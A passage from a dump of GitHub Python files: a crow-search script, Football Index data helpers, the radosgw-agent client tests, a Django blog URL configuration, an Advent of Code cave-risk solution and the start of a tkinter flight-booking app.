np.zeros(shape=(N,num_fragments))\nmemory = np.zeros(shape=(N,num_fragments))\n\ndef show_crows(solutions):\n print(\"SOLUTIONS\")\n for i in range(solutions.shape[0]):\n print(solutions[i])\n print(fitness(matrix, solutions[i]))\n\n\ndef init_population():\n for i in range(N):\n crow = np.arange(num_fragments) #individual = [0, 1, 2, ...] 
each index is a fragment\n np.random.shuffle(crow) #shuffle the fragment, this a ramdon solution\n crows[i] = crow\n return crows\n\n\"\"\"\ndef fitness(solution):\n #print(\"calculating fitness of: \", solution)\n overlap = 0\n for i in range(num_fragments - 1):\n #print(\"calculating overlap of: \", int(solution[i]), int(solution[i+1]))\n #print(\"overlap: \", matrix[ int(solution[i]), int(solution[i+1]) ] )\n overlap += matrix[int(solution[i]), int(solution[i+1])] #the overload is yet calculated in matrix\n \n #print(\"fitness calculated: \", overlap)\n return overlap\n\"\"\"\n\ndef P2M_F(individual):\n print(\"local search\")\n\n\ncrows = init_population()\nmemory = crows.copy()\n#print(crows)\n\niter=0\nwhile iter < ITERATIONS:\n print(\"ITERATION: \", iter)\n for i in range(N):\n print('CROW ', i)\n random_crow = random.randint(0, N-1) #chose a random crow\n r = random.random()\n if r >= AP:\n #print(\"the crow look up\", i)\n #print(\"perform oxfl operator\")\n crows[i] = OXFL(crows[i], crows[random_crow], FL)\n\n ################# local search ###################\n r_ls = random.random()\n if r_ls >= P_LS:\n print(\"local search...\")\n individual = crows[i].copy()\n individual = np.squeeze(np.asarray(individual))\n crows[i] = PALS(num_fragments, individual, matrix) \n\n else:\n #print(\"the crow move to ramdon position\", i)\n #the crow go to a random position\n #print('the crow go to random position', i, crows[i])\n np.random.shuffle(crows[i])\n #print('the crow went to random position', i, crows[i])\n #print(\"memory[i]: \",i, memory[i])\n #print(\"crows[i]: \",i, crows[i])\n\n if fitness(matrix, crows[i]) > fitness(matrix, memory[i]):\n #print(\"the new position is better, updating memory\")\n memory[i] = crows[i].copy()\n #print(\"memory[i]: \",i, memory[i])\n #print(\"crows[i]: \",i, crows[i])\n \n iter += 1\n\n\n# get the best fitness\nbest_fitness = 0\nfor i in range(N):\n fit = fitness(matrix, memory[i])\n if fit > best_fitness:\n best_fitness = fit\n\nprint(\"best fitness\", best_fitness)\n","repo_name":"arceda/bio-samples","sub_path":"DFS/crow_search.py","file_name":"crow_search.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32401193736","text":"import pandas as pd\n\n\ndef remove_duplicated_data(df):\n \"\"\"\n Short function that takes in a DataFrame, removes duplicates, and spits out new DataFrame\n :param df: pandas DataFrame\n :return: df without the duplicates\n \"\"\"\n df['temp_id'] = df['Date'].astype('str') + df['ID']\n\n return df.drop_duplicates('temp_id').drop(columns='temp_id')\n\n\ndef timeseries_dates(prices_df):\n \"\"\"\n Takes prices_df from Football Index database and returns dictionary of dates, between which are the dates that need\n to be filled in the timeseries\n :param prices_df: DataFrame of Football Index prices\n :return: dates, dict, of dates to be filled between\n \"\"\"\n assert (prices_df.shape[1] == 9), \"Ensure DataFrame being fed is prices_df; column count not equal to 9\"\n grouped = prices_df.groupby('Date').sum().reset_index()\n grouped['date_diff'] = (grouped['Date'] - grouped['Date'].shift()).dt.days\n grouped = grouped.dropna().reset_index(drop=True)\n outliers = grouped[grouped['date_diff'] != 1]\n rows = outliers.index.values\n dates = {}\n for r in rows:\n dates[grouped.iloc[r]['Date']] = grouped.iloc[r - 1]['Date']\n return dates\n\n\ndef returns_dataframe(prices_df):\n \"\"\"\n Quick function that takes in a prices 
dataframe as argument and returns a transposed returns dataframe\n \"\"\"\n player_prices_matrix = prices_df.pivot_table('Price', 'Date', 'Name').fillna(method='bfill', inplace=True)\n\n player_returns = pd.DataFrame(((player_prices_matrix.iloc[-1] / player_prices_matrix.iloc[0]) - 1) * 100).round(2)\n player_returns.sort_values(0, ascending=False).reset_index(inplace=True)\n player_returns.columns = ['Name', 'Returns_%']\n\n df = prices_df.drop_duplicates('Name')[['Name', 'Country', 'Team', 'Position']]\n\n return df.merge(player_returns, 'left', 'Name')\n","repo_name":"jpstephens93/football_index","sub_path":"utils/etl/data_handle.py","file_name":"data_handle.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3377627115","text":"import boto\nimport py.test\nfrom mock import Mock\nimport httpretty\nimport re\n\nfrom radosgw_agent import client\nfrom radosgw_agent import exceptions as exc\nfrom radosgw_agent.constants import DEFAULT_TIME\n\n# parametrization helpers\n\ndef endpoints():\n return [\n ('http://example.org', 'example.org', 80, False),\n ('https://example.org', 'example.org', 443, True),\n ('https://[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', '[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 443, True),\n ('http://[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', '[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 80, False),\n ('http://[e39:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]:8080', '[e39:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 8080, False),\n ('http://e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922', '[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 80, False),\n ('https://example.org:8080', 'example.org', 8080, True),\n ('https://example.org:8080/', 'example.org', 8080, True),\n ('http://example.org:81/a/b/c?b#d', 'example.org', 81, False),\n ]\n\n\nREGION_MAP = {\n \"regions\": [\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://vit:8001/\"\n ],\n \"log_data\": \"true\",\n \"log_meta\": \"true\",\n \"name\": \"skinny-1\"\n },\n {\n \"endpoints\": [\n \"http://vit:8002/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"skinny-2\"\n }\n ],\n \"name\": \"skinny\",\n \"default_placement\": \"\",\n \"master_zone\": \"skinny-1\",\n \"api_name\": \"slim\",\n \"placement_targets\": [],\n \"is_master\": \"true\",\n \"endpoints\": [\n \"http://skinny:80/\"\n ]\n },\n \"key\": \"skinny\"\n },\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://vit:8003/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"swab-2\"\n },\n {\n \"endpoints\": [\n \"http://vit:8004/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"swab-3\"\n },\n {\n \"endpoints\": [\n \"http://vit:8000/\"\n ],\n \"log_data\": \"true\",\n \"log_meta\": \"true\",\n \"name\": \"swab-1\"\n }\n ],\n \"name\": \"swab\",\n \"default_placement\": \"\",\n \"master_zone\": \"swab-1\",\n \"api_name\": \"shady\",\n \"placement_targets\": [],\n \"is_master\": \"false\",\n \"endpoints\": [\n \"http://vit:8000/\"\n ]\n },\n \"key\": \"swab\"\n },\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://ro:80/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"ro-1\"\n },\n {\n \"endpoints\": [\n \"http://ro:8080/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"ro-2\"\n },\n ],\n \"name\": \"readonly\",\n \"default_placement\": \"\",\n \"master_zone\": \"ro-1\",\n \"api_name\": \"readonly\",\n 
\"placement_targets\": [],\n \"is_master\": \"false\",\n \"endpoints\": [\n \"http://ro:80/\",\n \"http://ro:8080/\"\n ]\n },\n \"key\": \"readonly\"\n },\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://meta:80/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"true\",\n \"name\": \"meta-1\"\n },\n {\n \"endpoints\": [\n \"http://meta:8080/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"meta-2\"\n },\n ],\n \"name\": \"metaonly\",\n \"default_placement\": \"\",\n \"master_zone\": \"meta-1\",\n \"api_name\": \"metaonly\",\n \"placement_targets\": [],\n \"is_master\": \"false\",\n \"endpoints\": [\n \"http://meta:80/\",\n \"http://meta:8080/\"\n ]\n },\n \"key\": \"metaonly\"\n }\n ],\n \"master_region\": \"skinny\"\n }\n\ndef test_endpoint_default_port():\n endpoint = client.Endpoint('example.org', None, True)\n assert endpoint.port == 443\n endpoint = client.Endpoint('example.org', None, False)\n assert endpoint.port == 80\n\ndef test_endpoint_port_specified():\n endpoint = client.Endpoint('example.org', 80, True)\n assert endpoint.port == 80\n endpoint = client.Endpoint('example.org', 443, True)\n assert endpoint.port == 443\n\n\ndef test_endpoint_equality():\n default_port = client.Endpoint('a.org', None, True)\n secure = client.Endpoint('a.org', 443, True)\n insecure = client.Endpoint('a.org', 80, False)\n assert default_port == secure\n assert secure == insecure\n assert insecure == default_port\n\n\ndef test_endpoint_inequality():\n base = client.Endpoint('a.org', 80, True)\n diff_host = client.Endpoint('b.org', 80, True)\n diff_port = client.Endpoint('a.org', 81, True)\n insecure = client.Endpoint('a.org', 8080, False)\n assert base != diff_host\n assert base != diff_port\n assert base != insecure\n\n\n@py.test.mark.parametrize('url, host, port, secure', endpoints())\ndef test_parse_endpoint(url, host, port, secure):\n endpoint = client.parse_endpoint(url)\n assert endpoint.port == port\n assert endpoint.host == host\n assert endpoint.secure == secure\n\n\n@py.test.mark.parametrize('url, host, port, secure', endpoints())\ndef test_parse_repr(url, host, port, secure):\n endpoint = repr(client.parse_endpoint(url))\n assert str(secure) in endpoint\n assert str(host) in endpoint\n assert str(port) in endpoint\n\n\ndef test_parse_endpoint_bad_input():\n with py.test.raises(exc.InvalidProtocol):\n client.parse_endpoint('ftp://example.com')\n with py.test.raises(exc.InvalidHost):\n client.parse_endpoint('http://:80/')\n\ndef _test_configure_endpoints(dest_url, dest_region, dest_zone,\n expected_src_url, expected_src_region,\n expected_src_zone, specified_src_url=None,\n meta_only=False):\n dest = client.parse_endpoint(dest_url)\n if specified_src_url is not None:\n src = client.parse_endpoint(specified_src_url)\n else:\n src = client.Endpoint(None, None, None)\n region_map = client.RegionMap(REGION_MAP)\n client.configure_endpoints(region_map, dest, src, meta_only)\n assert dest.region.name == dest_region\n assert dest.zone.name == dest_zone\n assert src == client.parse_endpoint(expected_src_url)\n assert src.region.name == expected_src_region\n assert src.zone.name == expected_src_zone\n\ndef test_configure_endpoints_2nd_region_master_zone_meta():\n _test_configure_endpoints('http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=True)\n\ndef test_configure_endpoints_2nd_region_master_zone_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8000', 'swab', 'swab-1',\n 
'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=False)\n\ndef test_configure_endpoints_master_region_2nd_zone():\n _test_configure_endpoints('http://vit:8002', 'skinny', 'skinny-2',\n 'http://vit:8001', 'skinny', 'skinny-1')\n\ndef test_configure_endpoints_2nd_region_2nd_zone():\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8000', 'swab', 'swab-1')\n\ndef test_configure_endpoints_2nd_region_readonly_meta():\n _test_configure_endpoints('http://ro:8080', 'readonly', 'ro-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=True)\n\ndef test_configure_endpoints_2nd_region_readonly_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://ro:8080', 'readonly', 'ro-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=False)\n\ndef test_configure_endpoints_2nd_region_metaonly_meta():\n _test_configure_endpoints('http://meta:8080', 'metaonly', 'meta-2',\n 'http://meta:80', 'metaonly', 'meta-1',\n meta_only=True)\n\ndef test_configure_endpoints_2nd_region_metaonly_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://meta:8080', 'metaonly', 'meta-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=False)\n\ndef test_configure_endpoints_master_region_master_zone():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:8001', 'skinny', 'skinny-1')\n\ndef test_configure_endpoints_specified_src_same_region():\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8000')\n\ndef test_configure_endpoints_specified_src_master_region_meta():\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:8001', meta_only=True)\n\ndef test_configure_endpoints_specified_src_master_region_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:8001', meta_only=False)\n\ndef test_configure_endpoints_bad_src_same_region():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8004', 'swab', 'swab-3',\n 'http://vit:8004')\n\ndef test_configure_endpoints_bad_src_master_region():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8002', 'skinny', 'skinny-2',\n 'http://vit:8002')\n\ndef test_configure_endpoints_bad_src_same_zone():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8000')\n\ndef test_configure_endpoints_specified_nonexistent_src():\n with py.test.raises(exc.ZoneNotFound):\n _test_configure_endpoints('http://vit:8005', 'skinny', 'skinny-1',\n 'http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:80')\n\ndef test_configure_endpoints_unknown_zone():\n with py.test.raises(exc.ZoneNotFound):\n _test_configure_endpoints('http://vit:8005', 'skinny', 'skinny-1',\n 'http://vit:8001', 'skinny', 'skinny-1')\n\ndef http_invalid_status_codes():\n return [\n 101, 102, 300, 301, 302, 303, 304, 305, 306, 307, 308,\n ]\n\ndef http_valid_status_codes():\n return [\n 200, 201, 202, 203, 204, 205, 207, 208, 226,\n ]\n\nclass TestCheckResultStatus(object):\n\n @py.test.mark.parametrize('code', http_invalid_status_codes())\n def test_check_raises_http_error(self, code):\n 
response = Mock()\n            response.status = code\n            with py.test.raises(exc.HttpError):\n                client.check_result_status(response)\n\n    @py.test.mark.parametrize('code', http_valid_status_codes())\n    def test_check_does_not_raise_http_error(self, code):\n        response = Mock()\n        response.status = code\n        assert client.check_result_status(response) is None\n\n\n    def test_check_raises_not_found(self):\n        response = Mock()\n        response.status = 404\n        with py.test.raises(exc.NotFound):\n            client.check_result_status(response)\n\n\nclass TestBotoCall(object):\n\n    def test_return_val(self):\n        @client.boto_call\n        def foo(*args, **kwargs):\n            return (args, kwargs)\n        assert foo(1) == ((1,), {})\n        assert foo(b=2) == (tuple(), {'b': 2})\n\n    def test_boto_exception_not_found(self):\n        @client.boto_call\n        def foo():\n            raise boto.exception.S3ResponseError(404, '')\n\n        with py.test.raises(exc.NotFound):\n            foo()\n\n    def test_non_boto_exception(self):\n        @client.boto_call\n        def foo():\n            raise ValueError('')\n\n        with py.test.raises(ValueError):\n            foo()\n\n\nclass TestRequest(object):\n\n    @httpretty.activate\n    def test_url(self):\n\n        httpretty.register_uri(\n            httpretty.GET,\n            re.compile(\"http://localhost:8888/(.*)\"),\n            body='{}',\n            content_type=\"application/json\",\n        )\n        connection = client.connection(\n            client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n            True,\n        )\n\n        client.request(connection, 'get', '/%7E~', _retries=0)\n        server_request = httpretty.last_request()\n        assert server_request.path == '/%257E%7E'\n\n    @httpretty.activate\n    def test_url_response(self):\n\n        httpretty.register_uri(\n            httpretty.GET,\n            re.compile(\"http://localhost:8888/(.*)\"),\n            body='{\"msg\": \"ok\"}',\n            content_type=\"application/json\",\n        )\n        connection = client.connection(\n            client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n            True,\n        )\n\n        result = client.request(connection, 'get', '/%7E~', _retries=0)\n        assert result == {'msg': 'ok'}\n\n    @httpretty.activate\n    def test_url_bad(self):\n\n        httpretty.register_uri(\n            httpretty.GET,\n            re.compile(\"http://localhost:8888/(.*)\"),\n            body='{}',\n            content_type=\"application/json\",\n            status=500,\n        )\n        connection = client.connection(\n            client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n            True,\n        )\n\n        with py.test.raises(exc.HttpError):\n            client.request(connection, 'get', '/%7E~', _retries=0)\n\n\nclass TestGETClientRequestsPaths(object):\n\n    def setup(self):\n        self.connection = client.connection(\n            client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n            True,\n        )\n\n    def register(self, body=None):\n        body = body or '{}'\n        httpretty.register_uri(\n            httpretty.GET,\n            re.compile(\"http://localhost:8888/(.*)\"),\n            body=body,\n            content_type=\"application/json\",\n        )\n\n    @httpretty.activate\n    def test_get_metadata(self):\n        self.register()\n        client.get_metadata(self.connection, 'bucket.instance', 'foo')\n        server_request = httpretty.last_request()\n        assert server_request.path == '/admin/metadata/bucket.instance?key=foo'\n\n    @httpretty.activate\n    def 
test_get_metadata_no_re_encoding(self):\n self.register()\n client.get_metadata(self.connection, 'bucket.instance', 'mybar:r0z0.4140.1')\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata/bucket.instance?key=mybar%3Ar0z0.4140.1'\n\n @httpretty.activate\n def test_get_metadata_sections(self):\n self.register()\n client.get_metadata_sections(self.connection)\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata'\n\n @httpretty.activate\n def test_list_metadata_keys(self):\n self.register()\n client.list_metadata_keys(self.connection, 'foo')\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata/foo'\n\n @httpretty.activate\n def test_get_bucket_list(self):\n self.register()\n client.get_bucket_list(self.connection)\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata/bucket'\n\n @httpretty.activate\n def test_url_response(self):\n\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body='{\"msg\": \"ok\"}',\n content_type=\"application/json\",\n )\n result = client.request(self.connection, 'get', '/%7E~')\n assert result == {'msg': 'ok'}\n\n\nclass TestClientListObjectsInBucket(object):\n\n def setup(self):\n self.connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n self.body = \"\"\"\n [\n {\n \"name\": \"mahobject/\",\n \"etag\": \"d41d8cd98f00b204e9800998ecf8427e\",\n \"content_type\": \"application/octet-stream\",\n \"last_modified\": \"2015-01-15T15:24:42.000Z\",\n \"storage_class\": \"STANDARD\",\n \"owner\": {\n \"display_name\": \"client1-system-user\",\n \"id\": \"client1-system-user\"\n }\n }\n ]\n \"\"\"\n\n def register(self, body=None):\n body = body or self.body\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body=body,\n content_type=\"application/json\",\n )\n\n @httpretty.activate\n def test_get_bucket_is_a_single_item(self):\n self.register()\n result = client.get_bucket_list(self.connection)\n assert len(result) == 1\n\n @httpretty.activate\n def test_get_bucket_has_right_metadata(self):\n self.register()\n result = client.get_bucket_list(self.connection)\n obj = result[0]\n owner = {\n \"display_name\": \"client1-system-user\",\n \"id\": \"client1-system-user\"\n }\n assert obj['name'] == 'mahobject/'\n assert obj['etag'] == 'd41d8cd98f00b204e9800998ecf8427e'\n assert obj['content_type'] == 'application/octet-stream'\n assert obj['last_modified'] == '2015-01-15T15:24:42.000Z'\n assert obj['storage_class'] == 'STANDARD'\n assert obj['owner'] == owner\n\n\nclass TestClientGetWorkerBound(object):\n\n def setup(self):\n self.connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n self.body = \"\"\"\n {\"marker\": \"00000000002.2.3\",\n \"markers\": [\n {\n \"entity\": \"radosgw-agent\",\n \"items_in_progress\": [\n {\n \"name\": \"hello\",\n \"timestamp\": \"0.000000\"\n }\n ],\n \"position_marker\": \"00000000002.2.3\",\n \"position_time\": \"0.000000\"\n }\n ],\n \"oldest_time\": \"0.000000\"\n }\n \"\"\"\n\n def register(self, body=None, status=200):\n body = body or self.body\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body=body,\n content_type=\"application/json\",\n status=status\n )\n\n @httpretty.activate\n def test_get_bound_has_right_metadata(self):\n self.register()\n result = 
client.get_worker_bound(\n self.connection,\n 'bucket-index',\n 'beast:us-east'\n )\n assert result['marker'] == \"00000000002.2.3\"\n assert result['retries'] == set(['hello'])\n assert result['oldest_time'] == \"0.000000\"\n\n @httpretty.activate\n def test_get_bound_fails_fallsback_to_defaults(self):\n self.register(status=404)\n result = client.get_worker_bound(\n self.connection,\n 'bucket-index',\n 'beast:us-east'\n )\n assert result['marker'] == \" \"\n assert result['retries'] == []\n assert result['oldest_time'] == DEFAULT_TIME\n\n\nclass TestIsVersioned(object):\n\n def setup(self):\n # set strict attributes in the mock\n self.obj = Mock(spec=object)\n\n def test_is_in_fact_versioned(self):\n self.obj.VersionedEpoch = u'1'\n self.obj.version_id = 'somehashvalue'\n assert client.is_versioned(self.obj) is True\n\n def test_is_not_versioned_no_attr_versioned_epoch(self):\n assert client.is_versioned(self.obj) is False\n\n def test_is_not_versioned_no_attr_version_id(self):\n assert client.is_versioned(self.obj) is False\n\n def test_is_versioned_version_id(self):\n self.obj.version_id = 1\n assert client.is_versioned(self.obj) is True\n\n def test_is_not_versioned_versioned_id_is_none(self):\n self.obj.version_id = None\n assert client.is_versioned(self.obj) is False\n","repo_name":"ceph/radosgw-agent","sub_path":"radosgw_agent/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":23324,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"15510699809","text":"\"\"\"cnblog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom django.conf.urls import url\nfrom django.views.static import serve\nfrom blog.views import *\nfrom blog.utils.sdk import *\nfrom .settings import MEDIA_ROOT\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    # Login\n    path('login/', login),\n    # Get verification code\n    path('verify_code/', verify_code),\n    # Home page\n    path('index/', index),\n    # Register\n    path('register/', register),\n    # Log out\n    path('logout/', logout),\n    # Like\n    path('like/', like),\n    # Comment\n    path('comment/', comment),\n    # Upload avatar\n    path('upload/', upload),\n    # Check whether the user is logged in\n    path('is_login/', is_login),\n    # Admin backend\n    path('back_stage/', back_stage),\n    # Data lists shown in the admin backend (tags and categories)\n    path('back_stage_list/', back_stage_list),\n    # Add article\n    path('add_article/', add_article),\n    # Add category\n    path('add_sort/', add_sort),\n    # Add tag\n    path('add_tag/', add_tag),\n    # Change password\n    path('change_password/', change_password),\n    # Change avatar\n    path('change_avatar/', change_avatar),\n\n    # Slider captcha (geetest)\n    url(r'^pc-geetest/register', pcgetcaptcha, name='pcgetcaptcha'),\n    url(r'^mobile-geetest/register', pcgetcaptcha, name='mobilegetcaptcha'),\n    url(r'^pc-geetest/validate$', pcvalidate, name='pcvalidate'),\n    url(r'^pc-geetest/ajax_validate', pcajax_validate, name='pcajax_validate'),\n    url(r'^mobile-geetest/ajax_validate', mobileajax_validate, name='mobileajax_validate'),\n\n    # media configuration\n    re_path(r'media/(?P<path>.*)$', serve, {\"document_root\": MEDIA_ROOT}),\n    # Personal site lookup\n    re_path(r'^(?P<username>\w+)/$', home_site),\n    # Personal site filtering (by category, tag or date)\n    re_path(r'^(?P<username>\w+)/(?P<condition>sort|tag|date)/(?P<param>.*)/$', home_site),\n    # Delete article/category/tag\n    re_path(r'^delete/(?P<kind>sorts|tags|article)/(?P<nid>\w+)/$', delete),\n    # Edit article\n    re_path(r'^edit_article/(?P<article_id>\w+)/$', edit_article),\n    # Edit category\n    re_path(r'^edit_sort/(?P<sort_id>\w+)/$', edit_sort),\n    # Edit tag\n    re_path(r'^edit_tag/(?P<tag_id>\w+)/$', edit_tag),\n    # Article page\n    re_path(r'^(?P<username>\w+)/article/(?P<article_id>\d+)/$', article)\n]\n","repo_name":"ExBurner/BBS-Blog","sub_path":"cnblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15120308245","text":"#!python3\n\n'''\ndepth: 9171\ntarget: 7,721\n\nUse Dijkstra's algorithm for part 2\nhttps://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Practical_optimizations_and_infinite_graphs\n\n'''\n\nDEPTH = 9_171\nMODULO = 20_183\nX = 7\nY = 721\n\nTEST_DEPTH = 510\nTEST_X = 10\nTEST_Y = 10\n\n# equipment\nCLIMBING_GEAR = 'climbing_gear'\nTORCH = 'torch'\nNEITHER = 'neither'\n\n\nclass Map(object):\n    def __init__(self, depth, target_x, target_y):\n        self.depth = depth\n        self.target_x = target_x\n        self.target_y = target_y\n        self.geologic_indexes = {}\n\n\n    def get_geologic_index(self, x, y):\n        if (x, y) in self.geologic_indexes:\n            return self.geologic_indexes[(x, y)]\n        if x == 0 and y == 0:\n            self.geologic_indexes[(x, y)] = 0\n            return 0\n        if x == self.target_x and y == self.target_y:\n            self.geologic_indexes[(x, y)] = 0\n            return 0\n        if y == 0:\n            g_i = 16807 * x\n            self.geologic_indexes[(x, y)] = g_i\n            return g_i\n        if x == 0:\n            g_i = 48271 * y\n            self.geologic_indexes[(x, y)] = g_i\n            return g_i\n        g_i = self.get_erosion_level(x - 1, y) * self.get_erosion_level(x, y - 1)\n        self.geologic_indexes[(x, y)] = g_i\n        return g_i\n\n\n    def get_erosion_level(self, x, y):\n        g_i = self.get_geologic_index(x, y)\n        return (g_i + self.depth) % MODULO\n\n\n    def risk_level(self, x, y):\n        return self.get_erosion_level(x, y) % 3\n\n\n    def total_risk_level(self, x, y):\n        
total = 0\n for i in range(x + 1):\n for j in range(y + 1):\n total += self.risk_level(i, j)\n return total\n\n\nclass Node(object):\n def __init__(self, x, y, risk_level, equipment, time):\n self.x = x\n self.y = y\n self.risk_level = risk_level\n self.equipment = equipment\n self.time = time\n\n\nclass UniformCostSearch(object):\n risk_level_equipment = {\n 0: [CLIMBING_GEAR, TORCH],\n 1: [CLIMBING_GEAR, NEITHER],\n 2: [TORCH, NEITHER]\n }\n\n def __init__(self, start, goal, map):\n '''\n start: a node\n goal: a location (x, y)\n nodes: dictionary of Nodes where the keys are tuples - (x, y, equipment).\n '''\n self.start = start\n self.goal = goal\n self.nodes = {}\n self.map = map\n\n\n def _get_neighbours(self, node):\n pass\n\n\n def _get_equipment(self, risk_level):\n return UniformCostSearch.risk_level_equipment[risk_level]\n\n\ndef test1():\n map = Map(TEST_DEPTH, TEST_X, TEST_Y)\n r = map.total_risk_level(TEST_X, TEST_Y)\n assert r == 114\n\n\ndef part1():\n map = Map(DEPTH, X, Y)\n return map.total_risk_level(X, Y)\n\n\ndef test2():\n map = Map(TEST_DEPTH, TEST_X, TEST_Y)\n start = Node(0, 0, 0, TORCH, 0)\n goal = (TEST_X, TEST_Y)\n search = UniformCostSearch(start, goal, map)\n\n\ndef main():\n test1()\n\n p = part1()\n print(p)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2018/python/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27063531722","text":"import tkinter as tk\nfrom tkcalendar import DateEntry\nfrom tkinter import ttk, Label, Spinbox, messagebox\nfrom PIL import Image, ImageTk\n\nimport pymysql\nimport config\nimport FlightBooking\n\nclass BookingApp:\n def __init__(self, root):\n self.root = root\n self.root.geometry(f\"{root.winfo_screenwidth()}x{root.winfo_screenheight()}\")\n self.root.title(\"Sky Travellers: Flight Research\")\n\n self.header_height = root.winfo_screenheight() * 0.20\n self.window_width = root.winfo_screenwidth()\n self.window_height = root.winfo_screenheight()\n self.image2 = None\n self.image = None\n\n self.departure_var = tk.StringVar()\n self.arrival_var = tk.StringVar()\n self.num_tickets_var = tk.StringVar()\n\n self.create_window()\n\n def redirect_to_home_page(self, event):\n self.root.destroy()\n\n def create_window(self):\n conn = pymysql.connect(\n host='localhost',\n user='root',\n password='root',\n db='AirlineDatabase',\n port=8889\n )\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n\n cursor.execute(\"SELECT DISTINCT Departure_Airport FROM Flight\")\n departure_airports = [airport['Departure_Airport'] for airport in cursor.fetchall()]\n\n cursor.execute(\"SELECT DISTINCT Arrival_Airport FROM Flight\")\n arrival_airports = [airport['Arrival_Airport'] for airport in cursor.fetchall()]\n\n #background picture\n self.background_image = Image.open(\"../Pictures/bg4.png\")\n self.background_photo = ImageTk.PhotoImage(self.background_image.resize((self.window_width, self.window_height), Image.LANCZOS))\n background_label = tk.Label(self.root, image=self.background_photo)\n 